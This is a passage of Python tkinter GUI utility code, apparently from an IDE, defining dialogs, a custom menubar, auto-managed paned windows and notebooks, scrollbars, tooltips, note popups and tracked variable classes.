self.entry_widget = ttk.Entry(self.main_frame, textvariable=self.var, width=entry_width)
self.entry_widget.bind("<Return>", self.on_ok, True)
self.entry_widget.bind("<KP_Enter>", self.on_ok, True)
self.entry_widget.grid(
row=3, column=1, columnspan=2, sticky="we", padx=margin, pady=(0, margin)
)
self.ok_button = ttk.Button(
self.main_frame, text=tr("OK"), command=self.on_ok, default="active"
)
self.ok_button.grid(row=5, column=1, padx=(margin, spacing), pady=(0, margin), sticky="e")
self.cancel_button = ttk.Button(self.main_frame, text=tr("Cancel"), command=self.on_cancel)
self.cancel_button.grid(row=5, column=2, padx=(0, margin), pady=(0, margin), sticky="e")
self.main_frame.columnconfigure(1, weight=1)
self.entry_widget.focus_set()
def on_ok(self, event=None):
self.result = self.var.get()
self.destroy()
def on_cancel(self, event=None):
self.result = None
self.destroy()
def get_result(self) -> Optional[str]:
return self.result
def ask_string(
title: str,
prompt: str,
initial_value: str = "",
options: List[str] = [],
entry_width: Optional[int] = None,
master=None,
):
dlg = QueryDialog(
master, title, prompt, initial_value=initial_value, options=options, entry_width=entry_width
)
show_dialog(dlg, master)
return dlg.get_result()
class CustomMenubar(ttk.Frame):
def __init__(self, master):
ttk.Frame.__init__(self, master, style="CustomMenubar.TFrame")
self._menus = []
self._opened_menu = None
ttk.Style().map(
"CustomMenubarLabel.TLabel",
background=[
("!active", lookup_style_option("Menubar", "background", "gray")),
("active", lookup_style_option("Menubar", "activebackground", "LightYellow")),
],
foreground=[
("!active", lookup_style_option("Menubar", "foreground", "black")),
("active", lookup_style_option("Menubar", "activeforeground", "black")),
],
)
def add_cascade(self, label, menu):
label_widget = ttk.Label(
self,
style="CustomMenubarLabel.TLabel",
text=label,
padding=[6, 3, 6, 2],
font="TkDefaultFont",
)
if len(self._menus) == 0:
padx = (6, 0)
else:
padx = 0
label_widget.grid(row=0, column=len(self._menus), padx=padx)
def enter(event):
label_widget.state(("active",))
# Don't know how to open this menu when another menu is open
# another tk_popup just doesn't work unless old menu is closed by click or Esc
# https://stackoverflow.com/questions/38081470/is-there-a-way-to-know-if-tkinter-optionmenu-dropdown-is-active
# unpost doesn't work in Win and Mac: https://www.tcl.tk/man/tcl8.5/TkCmd/menu.htm#M62
# print("ENTER", menu, self._opened_menu)
if self._opened_menu is not None:
self._opened_menu.unpost()
click(event)
def leave(event):
label_widget.state(("!active",))
def click(event):
try:
# print("Before")
self._opened_menu = menu
menu.tk_popup(
label_widget.winfo_rootx(),
label_widget.winfo_rooty() + label_widget.winfo_height(),
)
finally:
# print("After")
self._opened_menu = None
label_widget.bind("<Enter>", enter, True)
label_widget.bind("<Leave>", leave, True)
label_widget.bind("<1>", click, True)
self._menus.append(menu)
class AutomaticPanedWindow(tk.PanedWindow):
"""
Enables inserting panes according to their position_key-s.
Automatically adds/removes itself to/from its master AutomaticPanedWindow.
Fixes some style glitches.
"""
def __init__(self, master, position_key=None, preferred_size_in_pw=None, **kwargs):
tk.PanedWindow.__init__(self, master, border=0, **kwargs)
self._pane_minsize = 100
self.position_key = position_key
self._restoring_pane_sizes = False
self._last_window_size = (0, 0)
self._full_size_not_final = True
self._configure_binding = self.bind("<Configure>", self._on_window_resize, True)
self._update_appearance_binding = self.bind(
"<<ThemeChanged>>", self._update_appearance, True
)
self.bind("<B1-Motion>", self._on_mouse_dragged, True)
self._update_appearance()
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def insert(self, pos, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
if pos == "auto":
# According to documentation I should use self.panes()
# but this doesn't return expected widgets
for sibling in sorted(
self.pane_widgets(),
key=lambda p: p.position_key if hasattr(p, "position_key") else 0,
):
if (
not hasattr(sibling, "position_key")
or sibling.position_key == None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
if isinstance(pos, tk.Widget):
kw["before"] = pos
self.add(child, **kw)
def add(self, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
tk.PanedWindow.add(self, child, **kw)
self._update_visibility()
self._check_restore_preferred_sizes()
def remove(self, child):
tk.PanedWindow.remove(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def forget(self, child):
tk.PanedWindow.forget(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def destroy(self):
self.unbind("<Configure>", self._configure_binding)
self.unbind("<<ThemeChanged>>", self._update_appearance_binding)
tk.PanedWindow.destroy(self)
def is_visible(self):
if not isinstance(self.master, AutomaticPanedWindow):
return self.winfo_ismapped()
else:
return self in self.master.pane_widgets()
def pane_widgets(self):
result = []
for pane in self.panes():
# pane is not the widget but some kind of reference object
assert not isinstance(pane, tk.Widget)
result.append(self.nametowidget(str(pane)))
return result
def _on_window_resize(self, event):
if event.width < 10 or event.height < 10:
return
window = self.winfo_toplevel()
window_size = (window.winfo_width(), window.winfo_height())
initializing = hasattr(window, "initializing") and window.initializing
if (
not initializing
and not self._restoring_pane_sizes
and (window_size != self._last_window_size or self._full_size_not_final)
):
self._check_restore_preferred_sizes()
self._last_window_size = window_size
def _on_mouse_dragged(self, event):
if event.widget == self and not self._restoring_pane_sizes:
self._update_preferred_sizes()
def _update_preferred_sizes(self):
for pane in self.pane_widgets():
if getattr(pane, "preferred_size_in_pw", None) is not None:
if self.cget("orient") == "horizontal":
current_size = pane.winfo_width()
else:
current_size = pane.winfo_height()
if current_size > 20:
pane.preferred_size_in_pw = current_size
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=current_size)
# else:
# self.paneconfig(pane, height=current_size)
#
# else:
# self.paneconfig(pane, width=1000, height=1000)
def _check_restore_preferred_sizes(self):
window = self.winfo_toplevel()
if getattr(window, "initializing", False):
return
try:
self._restoring_pane_sizes = True
self._restore_preferred_sizes()
finally:
self._restoring_pane_sizes = False
def _restore_preferred_sizes(self):
total_preferred_size = 0
panes_without_preferred_size = []
panes = self.pane_widgets()
for pane in panes:
if not hasattr(pane, "preferred_size_in_pw"):
# child isn't fully constructed yet
return
if pane.preferred_size_in_pw is None:
panes_without_preferred_size.append(pane)
# self.paneconfig(pane, width=1000, height=1000)
else:
total_preferred_size += pane.preferred_size_in_pw
# Without updating pane width/height attribute
# the preferred size may lose effect when squeezing
# non-preferred panes too small. Also zooming/unzooming
# changes the supposedly fixed panes ...
#
# but
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=pane.preferred_size_in_pw)
# else:
# self.paneconfig(pane, height=pane.preferred_size_in_pw)
assert len(panes_without_preferred_size) <= 1
size = self._get_size()
if size is None:
return
leftover_size = self._get_size() - total_preferred_size
used_size = 0
for i, pane in enumerate(panes[:-1]):
used_size += pane.preferred_size_in_pw or leftover_size
self._place_sash(i, used_size)
used_size += int(str(self.cget("sashwidth")))
def _get_size(self):
if self.cget("orient") == tk.HORIZONTAL:
result = self.winfo_width()
else:
result = self.winfo_height()
if result < 20:
# Not ready yet
return None
else:
return result
def _place_sash(self, i, distance):
if self.cget("orient") == tk.HORIZONTAL:
self.sash_place(i, distance, 0)
else:
self.sash_place(i, 0, distance)
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.panes()) == 0 and self.is_visible():
self.master.forget(self)
if len(self.panes()) > 0 and not self.is_visible():
self.master.insert("auto", self)
def _update_appearance(self, event=None):
self.configure(sashwidth=lookup_style_option("Sash", "sashthickness", ems_to_pixels(0.6)))
self.configure(background=lookup_style_option("TPanedWindow", "background"))
class ClosableNotebook(ttk.Notebook):
def __init__(self, master, style="ButtonNotebook.TNotebook", **kw):
super().__init__(master, style=style, **kw)
self.tab_menu = self.create_tab_menu()
self._popup_index = None
self.pressed_index = None
self.bind("<ButtonPress-1>", self._letf_btn_press, True)
self.bind("<ButtonRelease-1>", self._left_btn_release, True)
if running_on_mac_os():
self.bind("<ButtonPress-2>", self._right_btn_press, True)
self.bind("<Control-Button-1>", self._right_btn_press, True)
else:
self.bind("<ButtonPress-3>", self._right_btn_press, True)
# self._check_update_style()
def create_tab_menu(self):
menu = tk.Menu(self.winfo_toplevel(), tearoff=False, **get_style_configuration("Menu"))
menu.add_command(label=tr("Close"), command=self._close_tab_from_menu)
menu.add_command(label=tr("Close others"), command=self._close_other_tabs)
menu.add_command(label=tr("Close all"), command=self.close_tabs)
return menu
def _letf_btn_press(self, event):
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
if "closebutton" in elem:
self.state(["pressed"])
self.pressed_index = index
except Exception:
# may fail, if clicked outside of tab
return
def _left_btn_release(self, event):
if not self.instate(["pressed"]):
return
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
except Exception:
# may fail, when mouse is dragged
return
else:
if "closebutton" in elem and self.pressed_index == index:
self.close_tab(index)
self.state(["!pressed"])
finally:
self.pressed_index = None
def _right_btn_press(self, event):
try:
index = self.index("@%d,%d" % (event.x, event.y))
self._popup_index = index
self.tab_menu.tk_popup(*self.winfo_toplevel().winfo_pointerxy())
except Exception:
logger.exception("Opening tab menu")
def _close_tab_from_menu(self):
self.close_tab(self._popup_index)
def _close_other_tabs(self):
self.close_tabs(self._popup_index)
def close_tabs(self, except_index=None):
for tab_index in reversed(range(len(self.winfo_children()))):
if except_index is not None and tab_index == except_index:
continue
else:
self.close_tab(tab_index)
def close_tab(self, index):
child = self.get_child_by_index(index)
if hasattr(child, "close"):
child.close()
else:
self.forget(index)
child.destroy()
def get_child_by_index(self, index):
tab_id = self.tabs()[index]
if tab_id:
return self.nametowidget(tab_id)
else:
return None
def get_current_child(self):
child_id = self.select()
if child_id:
return self.nametowidget(child_id)
else:
return None
def focus_set(self):
editor = self.get_current_child()
if editor:
editor.focus_set()
else:
super().focus_set()
def _check_update_style(self):
style = ttk.Style()
if "closebutton" in style.element_names():
# It's done already
return
# respect if required images have been defined already
if "img_close" not in self.image_names():
img_dir = os.path.join(os.path.dirname(__file__), "res")
ClosableNotebook._close_img = tk.PhotoImage(
"img_tab_close", file=os.path.join(img_dir, "tab_close.gif")
)
ClosableNotebook._close_active_img = tk.PhotoImage(
"img_tab_close_active", file=os.path.join(img_dir, "tab_close_active.gif")
)
style.element_create(
"closebutton",
"image",
"img_tab_close",
("active", "pressed", "!disabled", "img_tab_close_active"),
("active", "!disabled", "img_tab_close_active"),
border=8,
sticky="",
)
style.layout(
"ButtonNotebook.TNotebook.Tab",
[
(
"Notebook.tab",
{
"sticky": "nswe",
"children": [
(
"Notebook.padding",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.focus",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.label",
{"side": "left", "sticky": ""},
),
(
"Notebook.closebutton",
{"side": "left", "sticky": ""},
),
],
},
)
],
},
)
],
},
)
],
)
def _check_remove_padding(self, kw):
# Windows themes produce 1-pixel padding to the bottom of the pane
# Don't know how to get rid of it using themes
if "padding" not in kw and ttk.Style().theme_use().lower() in (
"windows",
"xpnative",
"vista",
):
kw["padding"] = (0, 0, 0, -1)
def add(self, child, **kw):
self._check_remove_padding(kw)
super().add(child, **kw)
def insert(self, pos, child, **kw):
self._check_remove_padding(kw)
super().insert(pos, child, **kw)
class AutomaticNotebook(ClosableNotebook):
"""
Enables inserting views according to their position keys.
Remember its own position key. Automatically updates its visibility.
"""
def __init__(self, master, position_key, preferred_size_in_pw=None):
if get_workbench().in_simple_mode():
style = "TNotebook"
else:
style = "ButtonNotebook.TNotebook"
super().__init__(master, style=style, padding=0)
self.position_key = position_key
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def add(self, child, **kw):
super().add(child, **kw)
self._update_visibility()
def insert(self, pos, child, **kw):
if pos == "auto":
for sibling in map(self.nametowidget, self.tabs()):
if (
not hasattr(sibling, "position_key")
or sibling.position_key == None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
super().insert(pos, child, **kw)
self._update_visibility()
def hide(self, tab_id):
super().hide(tab_id)
self._update_visibility()
def forget(self, tab_id):
if tab_id in self.tabs() or tab_id in self.winfo_children():
super().forget(tab_id)
self._update_visibility()
def is_visible(self):
return self in self.master.pane_widgets()
def get_visible_child(self):
for child in self.winfo_children():
if str(child) == str(self.select()):
return child
return None
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.tabs()) == 0 and self.is_visible():
self.master.remove(self)
if len(self.tabs()) > 0 and not self.is_visible():
self.master.insert("auto", self)
class TreeFrame(ttk.Frame):
def __init__(
self,
master,
columns,
displaycolumns="#all",
show_scrollbar=True,
show_statusbar=False,
borderwidth=0,
relief="flat",
**tree_kw,
):
ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
# http://wiki.tcl.tk/44444#pagetoc50f90d9a
self.vert_scrollbar = ttk.Scrollbar(
self, orient=tk.VERTICAL, style=scrollbar_style("Vertical")
)
if show_scrollbar:
self.vert_scrollbar.grid(
row=0, column=1, sticky=tk.NSEW, rowspan=2 if show_statusbar else 1
)
self.tree = ttk.Treeview(
self,
columns=columns,
displaycolumns=displaycolumns,
yscrollcommand=self.vert_scrollbar.set,
**tree_kw,
)
self.tree["show"] = "headings"
self.tree.grid(row=0, column=0, sticky=tk.NSEW)
self.vert_scrollbar["command"] = self.tree.yview
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.tree.bind("<<TreeviewSelect>>", self.on_select, "+")
self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
self.error_label = ttk.Label(self.tree)
if show_statusbar:
self.statusbar = ttk.Frame(self)
self.statusbar.grid(row=1, column=0, sticky="nswe")
else:
self.statusbar = None
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def on_select(self, event):
pass
def on_double_click(self, event):
pass
def show_error(self, error_text):
self.error_label.configure(text=error_text)
self.error_label.grid()
def clear_error(self):
self.error_label.grid_remove()
def scrollbar_style(orientation):
# In mac ttk.Scrollbar uses native rendering unless style attribute is set
# see http://wiki.tcl.tk/44444#pagetoc50f90d9a
# Native rendering doesn't look good in dark themes
if running_on_mac_os() and get_workbench().uses_dark_ui_theme():
return orientation + ".TScrollbar"
else:
return None
def sequence_to_accelerator(sequence):
"""Translates Tk event sequence to customary shortcut string
for showing in the menu"""
if not sequence:
return ""
if not sequence.startswith("<"):
return sequence
accelerator = (
sequence.strip("<>").replace("Key-", "").replace("KeyPress-", "").replace("Control", "Ctrl")
)
# Tweaking individual parts
parts = accelerator.split("-")
# tkinter shows shift with capital letter, but in shortcuts it's customary to include it explicitly
if len(parts[-1]) == 1 and parts[-1].isupper() and not "Shift" in parts:
parts.insert(-1, "Shift")
# even when shift is not required, it's customary to show shortcut with capital letter
if len(parts[-1]) == 1:
parts[-1] = parts[-1].upper()
accelerator = "+".join(parts)
# Post processing
accelerator = (
accelerator.replace("Minus", "-")
.replace("minus", "-")
.replace("Plus", "+")
.replace("plus", "+")
)
return accelerator
def get_zoomed(toplevel):
if "-zoomed" in toplevel.wm_attributes(): # Linux
return bool(toplevel.wm_attributes("-zoomed"))
else: # Win/Mac
return toplevel.wm_state() == "zoomed"
def set_zoomed(toplevel, value):
if "-zoomed" in toplevel.wm_attributes(): # Linux
toplevel.wm_attributes("-zoomed", str(int(value)))
else: # Win/Mac
if value:
toplevel.wm_state("zoomed")
else:
toplevel.wm_state("normal")
class EnhancedTextWithLogging(tktextext.EnhancedText):
def __init__(self, master=None, style="Text", tag_current_line=False, cnf={}, **kw):
super().__init__(
master=master, style=style, tag_current_line=tag_current_line, cnf=cnf, **kw
)
self._last_event_changed_line_count = False
def direct_insert(self, index, chars, tags=None, **kw):
# try removing line numbers
# TODO: shouldn't it take place only on paste?
# TODO: does it occur when opening a file with line numbers in it?
# if self._propose_remove_line_numbers and isinstance(chars, str):
# chars = try_remove_linenumbers(chars, self)
concrete_index = self.index(index)
line_before = self.get(concrete_index + " linestart", concrete_index + " lineend")
self._last_event_changed_line_count = "\n" in chars
result = tktextext.EnhancedText.direct_insert(self, index, chars, tags=tags, **kw)
line_after = self.get(concrete_index + " linestart", concrete_index + " lineend")
trivial_for_coloring, trivial_for_parens = self._is_trivial_edit(
chars, line_before, line_after
)
get_workbench().event_generate(
"TextInsert",
index=concrete_index,
text=chars,
tags=tags,
text_widget=self,
trivial_for_coloring=trivial_for_coloring,
trivial_for_parens=trivial_for_parens,
)
return result
def direct_delete(self, index1, index2=None, **kw):
try:
# index1 may be eg "sel.first" and it doesn't make sense *after* deletion
concrete_index1 = self.index(index1)
if index2 is not None:
concrete_index2 = self.index(index2)
else:
concrete_index2 = None
chars = self.get(index1, index2)
self._last_event_changed_line_count = "\n" in chars
line_before = self.get(
concrete_index1 + " linestart",
(concrete_index1 if concrete_index2 is None else concrete_index2) + " lineend",
)
return tktextext.EnhancedText.direct_delete(self, index1, index2=index2, **kw)
finally:
line_after = self.get(
concrete_index1 + " linestart",
(concrete_index1 if concrete_index2 is None else concrete_index2) + " lineend",
)
trivial_for_coloring, trivial_for_parens = self._is_trivial_edit(
chars, line_before, line_after
)
get_workbench().event_generate(
"TextDelete",
index1=concrete_index1,
index2=concrete_index2,
text_widget=self,
trivial_for_coloring=trivial_for_coloring,
trivial_for_parens=trivial_for_parens,
)
def _is_trivial_edit(self, chars, line_before, line_after):
# line is taken after edit for insertion and before edit for deletion
if not chars.strip():
# linebreaks, including with automatic indent
# check it doesn't break a triple-quote
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = trivial_for_coloring
elif len(chars) > 1:
# paste, cut, load or something like this
trivial_for_coloring = False
trivial_for_parens = False
elif chars == "#":
trivial_for_coloring = "''''" not in line_before and '"""' not in line_before
trivial_for_parens = trivial_for_coloring and not re.search(PARENS_REGEX, line_before)
elif chars in "()[]{}":
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = False
elif chars == "'":
trivial_for_coloring = "'''" not in line_before and "'''" not in line_after
trivial_for_parens = False # can put parens into open string
elif chars == '"':
trivial_for_coloring = '"""' not in line_before and '"""' not in line_after
trivial_for_parens = False # can put parens into open string
elif chars == "\\":
# can shorten closing quote
trivial_for_coloring = '"""' not in line_before and '"""' not in line_after
trivial_for_parens = False
else:
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = trivial_for_coloring
return trivial_for_coloring, trivial_for_parens
class SafeScrollbar(ttk.Scrollbar):
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
try:
ttk.Scrollbar.set(self, first, last)
except Exception:
traceback.print_exc()
class AutoScrollbar(SafeScrollbar):
# http://effbot.org/zone/tkinter-autoscrollbar.htm
# a vert_scrollbar that hides itself if it's not needed. only
# works if you use the grid geometry manager.
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
if float(first) <= 0.0 and float(last) >= 1.0:
self.grid_remove()
elif float(first) > 0.001 or float(last) < 0.009:
# with >0 and <1 it occasionally made scrollbar wobble back and forth
self.grid()
ttk.Scrollbar.set(self, first, last)
def pack(self, **kw):
raise tk.TclError("cannot use pack with this widget")
def place(self, **kw):
raise tk.TclError("cannot use place with this widget")
def update_entry_text(entry, text):
original_state = entry.cget("state")
entry.config(state="normal")
entry.delete(0, "end")
entry.insert(0, text)
entry.config(state=original_state)
class VerticallyScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self.update_scrollbars()
def _configure_interior(self, event):
self.update_scrollbars()
def update_scrollbars(self):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_width(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
if (
self.interior.winfo_reqwidth() != self.canvas.winfo_width()
and self.canvas.winfo_width() > 10
):
# update the interior's width to fit canvas
# print("CAWI", self.canvas.winfo_width())
self.canvas.itemconfigure(self.interior_id, width=self.canvas.winfo_width())
class ScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
hscrollbar = ttk.Scrollbar(self, orient=tk.HORIZONTAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
hscrollbar.config(command=self.canvas.xview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
hscrollbar.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior.columnconfigure(0, weight=1)
self.interior.rowconfigure(0, weight=1)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self._configure_interior(event)
def _configure_interior(self, event):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_reqwidth(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
class ThemedListbox(tk.Listbox):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self._ui_theme_change_binding = self.bind(
"<<ThemeChanged>>", self._reload_theme_options, True
)
self._reload_theme_options()
def _reload_theme_options(self, event=None):
style = ttk.Style()
states = []
if self["state"] == "disabled":
states.append("disabled")
# Following crashes when a combobox is focused
# if self.focus_get() == self:
# states.append("focus")
opts = {}
for key in [
"background",
"foreground",
"highlightthickness",
"highlightcolor",
"highlightbackground",
]:
value = style.lookup(self.get_style_name(), key, states)
if value:
opts[key] = value
self.configure(opts)
def get_style_name(self):
return "Listbox"
def destroy(self):
self.unbind("<<ThemeChanged>>", self._ui_theme_change_binding)
super().destroy()
class ToolTip:
"""Taken from http://www.voidspace.org.uk/python/weblog/arch_d7_2006_07_01.shtml"""
def __init__(self, widget, options):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
self.options = options
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, _, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 27
y = y + cy + self.widget.winfo_rooty() + self.widget.winfo_height() + 2
self.tipwindow = tw = tk.Toplevel(self.widget)
if running_on_mac_os():
try:
# Must be the first thing to do after creating window
# https://wiki.tcl-lang.org/page/MacWindowStyle
tw.tk.call(
"::tk::unsupported::MacWindowStyle", "style", tw._w, "help", "noActivates"
)
if get_tk_version_info() >= (8, 6, 10) and running_on_mac_os():
tw.wm_overrideredirect(1)
except tk.TclError:
pass
else:
tw.wm_overrideredirect(1)
tw.wm_geometry("+%d+%d" % (x, y))
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
tw.wm_transient(self.widget)
label = tk.Label(tw, text=self.text, **self.options)
label.pack()
# get_workbench().bind("WindowFocusOut", self.hidetip, True)
def hidetip(self, event=None):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
# get_workbench().unbind("WindowFocusOut", self.hidetip)
def create_tooltip(widget, text, **kw):
options = get_style_configuration("Tooltip").copy()
options.setdefault("background", "#ffffe0")
options.setdefault("foreground", "#000000")
options.setdefault("relief", "solid")
options.setdefault("borderwidth", 1)
options.setdefault("padx", 1)
options.setdefault("pady", 0)
options.update(kw)
toolTip = ToolTip(widget, options)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind("<Enter>", enter)
widget.bind("<Leave>", leave)
class NoteBox(CommonDialog):
def __init__(self, master=None, max_default_width=300, **kw):
super().__init__(master=master, highlightthickness=0, **kw)
self._max_default_width = max_default_width
self.wm_overrideredirect(True)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
self.wm_transient(master)
try:
# For Mac OS
self.tk.call(
"::tk::unsupported::MacWindowStyle", "style", self._w, "help", "noActivates"
)
except tk.TclError:
pass
self._current_chars = ""
self._click_bindings = {}
self.padx = 5
self.pady = 5
self.text = TweakableText(
self,
background="#ffffe0",
borderwidth=1,
relief="solid",
undo=False,
read_only=True,
font="TkDefaultFont",
highlightthickness=0,
padx=self.padx,
pady=self.pady,
wrap="word",
)
self.text.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.text.bind("<Escape>", self.close, True)
# tk._default_root.bind_all("<1>", self._close_maybe, True)
# tk._default_root.bind_all("<Key>", self.close, True)
self.withdraw()
def clear(self):
for tag in self._click_bindings:
self.text.tag_unbind(tag, "<1>", self._click_bindings[tag])
self.text.tag_remove(tag, "1.0", "end")
self.text.direct_delete("1.0", "end")
self._current_chars = ""
self._click_bindings.clear()
def set_content(self, *items):
self.clear()
for item in items:
if isinstance(item, str):
self.text.direct_insert("1.0", item)
self._current_chars = item
else:
assert isinstance(item, (list, tuple))
chars, *props = item
if len(props) > 0 and callable(props[-1]):
tags = tuple(props[:-1])
click_handler = props[-1]
else:
tags = tuple(props)
click_handler = None
self.append_text(chars, tags, click_handler)
self.text.see("1.0")
def append_text(self, chars, tags=(), click_handler=None):
tags = tuple(tags)
if click_handler is not None:
click_tag = "click_%d" % len(self._click_bindings)
tags = tags + (click_tag,)
binding = self.text.tag_bind(click_tag, "<1>", click_handler, True)
self._click_bindings[click_tag] = binding
self.text.direct_insert("end", chars, tags)
self._current_chars += chars
def place(self, target, focus=None):
# Compute the area that will be described by this Note
focus_x = target.winfo_rootx()
focus_y = target.winfo_rooty()
focus_height = target.winfo_height()
if isinstance(focus, TextRange):
assert isinstance(target, tk.Text)
topleft = target.bbox("%d.%d" % (focus.lineno, focus.col_offset))
if focus.end_col_offset == 0:
botright = target.bbox(
"%d.%d lineend" % (focus.end_lineno - 1, focus.end_lineno - 1)
)
else:
botright = target.bbox("%d.%d" % (focus.end_lineno, focus.end_col_offset))
if topleft and botright:
focus_x += topleft[0]
focus_y += topleft[1]
focus_height = botright[1] - topleft[1] + botright[3]
elif isinstance(focus, (list, tuple)):
focus_x += focus[0]
focus_y += focus[1]
focus_height = focus[3]
elif focus is None:
pass
else:
raise TypeError("Unsupported focus")
# Compute dimensions of the note
font = self.text["font"]
if isinstance(font, str):
font = tk.font.nametofont(font)
lines = self._current_chars.splitlines()
max_line_width = 0
for line in lines:
max_line_width = max(max_line_width, font.measure(line))
width = min(max_line_width, self._max_default_width) + self.padx * 2 + 2
self.wm_geometry("%dx%d+%d+%d" % (width, 100, focus_x, focus_y + focus_height))
self.update_idletasks()
line_count = int(float(self.text.index("end")))
line_height = font.metrics()["linespace"]
self.wm_geometry(
"%dx%d+%d+%d" % (width, line_count * line_height, focus_x, focus_y + focus_height)
)
# TODO: detect the situation when note doesn't fit under
# the focus box and should be placed above
self.deiconify()
def show_note(self, *content_items: Union[str, List], target=None, focus=None) -> None:
self.set_content(*content_items)
self.place(target, focus)
def _close_maybe(self, event):
if event.widget not in [self, self.text]:
self.close(event)
def close(self, event=None):
self.withdraw()
def get_widget_offset_from_toplevel(widget):
x = 0
y = 0
toplevel = widget.winfo_toplevel()
while widget != toplevel:
x += widget.winfo_x()
y += widget.winfo_y()
widget = widget.master
return x, y
class EnhancedVar(tk.Variable):
def __init__(self, master=None, value=None, name=None, modification_listener=None):
if master is not None and not isinstance(master, (tk.Widget, tk.Wm)):
raise TypeError("First positional argument 'master' must be None, Widget or Wm")
super().__init__(master=master, value=value, name=name)
self.modified = False
self.modification_listener = modification_listener
if sys.version_info < (3, 6):
self.trace("w", self._on_write)
else:
self.trace_add("write", self._on_write)
def _on_write(self, *args):
self.modified = True
if self.modification_listener:
try:
self.modification_listener()
except Exception:
# Otherwise whole process will be brought down
# because for some reason Tk tries to call non-existing method
# on variable
get_workbench().report_exception()
class EnhancedStringVar(EnhancedVar, tk.StringVar):
pass
class EnhancedIntVar(EnhancedVar, tk.IntVar):
pass
class EnhancedBooleanVar(EnhancedVar, tk.BooleanVar):
pass
class EnhancedDoubleVar(EnhancedVar, tk.DoubleVar):
pass
def create_string_var(value, modification_listener=None) -> EnhancedStringVar:
"""Creates a tk.StringVar with "modified" attribute
showing whether the variable has been modified after creation"""
return EnhancedStringVar(None, value, None, modification_listener)
def create_int_var(value, modification_listener=None) -> EnhancedIntVar:
"""See create_string_var"""
return EnhancedIntVar(None, value, None, modification_listener)
def create_double_var(value, modification_listener=None) -> EnhancedDoubleVar:
"""See create_string_var"""
return EnhancedDoubleVar(None, value, None, modification_listener)
